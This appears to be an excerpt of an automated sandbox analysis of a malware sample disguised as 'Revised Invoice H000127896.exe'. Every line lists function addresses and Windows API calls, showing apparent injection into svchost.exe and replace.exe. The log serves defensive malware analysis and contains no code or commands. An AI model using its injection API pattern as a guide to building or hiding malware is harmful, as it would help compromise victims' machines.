            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB2AF0 NtWriteFile,LdrInitializeThunk,5_2_02AB2AF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB2AD0 NtReadFile,LdrInitializeThunk,5_2_02AB2AD0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB2BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_02AB2BA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB2BE0 NtQueryValueKey,LdrInitializeThunk,5_2_02AB2BE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_02AB2BF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB2B60 NtClose,LdrInitializeThunk,5_2_02AB2B60
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB2E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_02AB2E80
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB2EE0 NtQueueApcThread,LdrInitializeThunk,5_2_02AB2EE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB2FB0 NtResumeThread,LdrInitializeThunk,5_2_02AB2FB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB2FE0 NtCreateFile,LdrInitializeThunk,5_2_02AB2FE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB2F30 NtCreateSection,LdrInitializeThunk,5_2_02AB2F30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_02AB2CA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB2C60 NtCreateKey,LdrInitializeThunk,5_2_02AB2C60
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_02AB2C70
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_02AB2DF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB2DD0 NtDelayExecution,LdrInitializeThunk,5_2_02AB2DD0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB2D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_02AB2D30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_02AB2D10
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB35C0 NtCreateMutant,LdrInitializeThunk,5_2_02AB35C0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB39B0 NtGetContextThread,LdrInitializeThunk,5_2_02AB39B0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB2AB0 NtWaitForSingleObject,5_2_02AB2AB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB2B80 NtQueryInformationFile,5_2_02AB2B80
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB2EA0 NtAdjustPrivilegesToken,5_2_02AB2EA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB2E30 NtWriteVirtualMemory,5_2_02AB2E30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB2FA0 NtQuerySection,5_2_02AB2FA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB2F90 NtProtectVirtualMemory,5_2_02AB2F90
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB2F60 NtCreateProcessEx,5_2_02AB2F60
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB2CF0 NtOpenProcess,5_2_02AB2CF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB2CC0 NtQueryVirtualMemory,5_2_02AB2CC0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB2C00 NtQueryInformationProcess,5_2_02AB2C00
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB2DB0 NtEnumerateKey,5_2_02AB2DB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB2D00 NtSetInformationFile,5_2_02AB2D00
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB3090 NtSetValueKey,5_2_02AB3090
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB3010 NtOpenDirectoryObject,5_2_02AB3010
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB3D10 NtOpenProcessToken,5_2_02AB3D10
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB3D70 NtOpenThread,5_2_02AB3D70
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02148EB0 NtReadFile,5_2_02148EB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02148FA0 NtDeleteFile,5_2_02148FA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02148D40 NtCreateFile,5_2_02148D40
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02149040 NtClose,5_2_02149040
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_021491B0 NtAllocateVirtualMemory,5_2_021491B0
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_004096A00_2_004096A0
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0042200C0_2_0042200C
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0041A2170_2_0041A217
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_004122160_2_00412216
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0042435D0_2_0042435D
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_004033C00_2_004033C0
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0044F4300_2_0044F430
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_004125E80_2_004125E8
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0044663B0_2_0044663B
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_004138010_2_00413801
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0042096F0_2_0042096F
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_004129D00_2_004129D0
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_004119E30_2_004119E3
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0041C9AE0_2_0041C9AE
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0047EA6F0_2_0047EA6F
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0040FA100_2_0040FA10
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0044EB5F0_2_0044EB5F
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_00423C810_2_00423C81
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_00411E780_2_00411E78
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_00442E0C0_2_00442E0C
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_00420EC00_2_00420EC0
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0044CF170_2_0044CF17
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_00444FD20_2_00444FD2
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_040A72800_2_040A7280
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004182E32_2_004182E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004030402_2_00403040
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042E9032_2_0042E903
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012102_2_00401210
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FB532_2_0040FB53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004023702_2_00402370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004164C32_2_004164C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FD732_2_0040FD73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DDF32_2_0040DDF3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E3F02_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039003E62_2_039003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FA3522_2_038FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C02C02_2_038C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E02742_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F41A22_2_038F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039001AA2_2_039001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F81CC2_2_038F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038301002_2_03830100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA1182_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C81582_2_038C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D20002_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383C7C02_2_0383C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038647502_2_03864750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038407702_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385C6E02_2_0385C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039005912_2_03900591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038405352_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EE4F62_2_038EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E44202_2_038E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F24462_2_038F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F6BD72_2_038F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FAB402_2_038FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA802_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A02_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390A9A62_2_0390A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038569622_2_03856962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038268B82_2_038268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E8F02_2_0386E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384A8402_2_0384A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038428402_2_03842840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BEFA02_2_038BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832FC82_2_03832FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384CFE02_2_0384CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03882F282_2_03882F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03860F302_2_03860F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E2F302_2_038E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B4F402_2_038B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852E902_2_03852E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FCE932_2_038FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FEEDB2_2_038FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FEE262_2_038FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840E592_2_03840E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03858DBF2_2_03858DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383ADE02_2_0383ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384AD002_2_0384AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DCD1F2_2_038DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0CB52_2_038E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830CF22_2_03830CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840C002_2_03840C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0388739A2_2_0388739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F132D2_2_038F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382D34C2_2_0382D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038452A02_2_038452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385B2C02_2_0385B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E12ED2_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384B1B02_2_0384B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387516C2_2_0387516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F1722_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390B16B2_2_0390B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EF0CC2_2_038EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C02_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F70E92_2_038F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FF0E02_2_038FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FF7B02_2_038FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F16CC2_2_038F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038856302_2_03885630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DD5B02_2_038DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039095C32_2_039095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F75712_2_038F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FF43F2_2_038FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038314602_2_03831460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385FB802_2_0385FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B5BF02_2_038B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387DBF92_2_0387DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFB762_2_038FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DDAAC2_2_038DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03885AA02_2_03885AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E1AA32_2_038E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EDAC62_2_038EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFA492_2_038FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F7A462_2_038F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B3A6C2_2_038B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D59102_2_038D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038499502_2_03849950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385B9502_2_0385B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038438E02_2_038438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AD8002_2_038AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03841F922_2_03841F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFFB12_2_038FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03803FD22_2_03803FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03803FD52_2_03803FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFF092_2_038FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03849EB02_2_03849EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385FDC02_2_0385FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03843D402_2_03843D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F1D5A2_2_038F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F7D732_2_038F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFCF22_2_038FFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B9C322_2_038B9C32
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeCode function: 4_2_03D5B3A14_2_03D5B3A1
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeCode function: 4_2_03D54A314_2_03D54A31
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeCode function: 4_2_03D5D1C14_2_03D5D1C1
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeCode function: 4_2_03D737E14_2_03D737E1
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeCode function: 4_2_03D52CD14_2_03D52CD1
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeCode function: 4_2_03D54C514_2_03D54C51
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B002C05_2_02B002C0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B202745_2_02B20274
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B403E65_2_02B403E6
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A8E3F05_2_02A8E3F0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B3A3525_2_02B3A352
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B120005_2_02B12000
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B341A25_2_02B341A2
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B401AA5_2_02B401AA
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B381CC5_2_02B381CC
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A701005_2_02A70100
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B1A1185_2_02B1A118
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B081585_2_02B08158
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A9C6E05_2_02A9C6E0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A7C7C05_2_02A7C7C0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A807705_2_02A80770
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AA47505_2_02AA4750
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B2E4F65_2_02B2E4F6
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B244205_2_02B24420
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B324465_2_02B32446
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B405915_2_02B40591
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A805355_2_02A80535
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A7EA805_2_02A7EA80
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B36BD75_2_02B36BD7
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B3AB405_2_02B3AB40
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A668B85_2_02A668B8
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AAE8F05_2_02AAE8F0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A8A8405_2_02A8A840
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A828405_2_02A82840
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A829A05_2_02A829A0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B4A9A65_2_02B4A9A6
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A969625_2_02A96962
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B3CE935_2_02B3CE93
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A92E905_2_02A92E90
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B3EEDB5_2_02B3EEDB
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B3EE265_2_02B3EE26
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A80E595_2_02A80E59
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AFEFA05_2_02AFEFA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A8CFE05_2_02A8CFE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A72FC85_2_02A72FC8
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B22F305_2_02B22F30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AC2F285_2_02AC2F28
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AA0F305_2_02AA0F30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AF4F405_2_02AF4F40
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B20CB55_2_02B20CB5
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A70CF25_2_02A70CF2
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A80C005_2_02A80C00
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A98DBF5_2_02A98DBF
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A7ADE05_2_02A7ADE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A8AD005_2_02A8AD00
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B1CD1F5_2_02B1CD1F
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A852A05_2_02A852A0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B212ED5_2_02B212ED
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A9B2C05_2_02A9B2C0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AC739A5_2_02AC739A
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B3132D5_2_02B3132D
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A6D34C5_2_02A6D34C
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B3F0E05_2_02B3F0E0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B370E95_2_02B370E9
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A870C05_2_02A870C0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B2F0CC5_2_02B2F0CC
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A8B1B05_2_02A8B1B0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AB516C5_2_02AB516C
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A6F1725_2_02A6F172
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B4B16B5_2_02B4B16B
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B316CC5_2_02B316CC
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AC56305_2_02AC5630
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B3F7B05_2_02B3F7B0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B3F43F5_2_02B3F43F
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A714605_2_02A71460
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B1D5B05_2_02B1D5B0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B495C35_2_02B495C3
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B375715_2_02B37571
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AC5AA05_2_02AC5AA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B21AA35_2_02B21AA3
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B1DAAC5_2_02B1DAAC
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B2DAC65_2_02B2DAC6
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AF3A6C5_2_02AF3A6C
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B37A465_2_02B37A46
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B3FA495_2_02B3FA49
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A9FB805_2_02A9FB80
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02ABDBF95_2_02ABDBF9
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AF5BF05_2_02AF5BF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B3FB765_2_02B3FB76
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A838E05_2_02A838E0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AED8005_2_02AED800
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B159105_2_02B15910
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A899505_2_02A89950
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A9B9505_2_02A9B950
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A89EB05_2_02A89EB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B3FFB15_2_02B3FFB1
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A81F925_2_02A81F92
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A43FD55_2_02A43FD5
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A43FD25_2_02A43FD2
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B3FF095_2_02B3FF09
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B3FCF25_2_02B3FCF2
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02AF9C325_2_02AF9C32
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A9FDC05_2_02A9FDC0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B37D735_2_02B37D73
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02A83D405_2_02A83D40
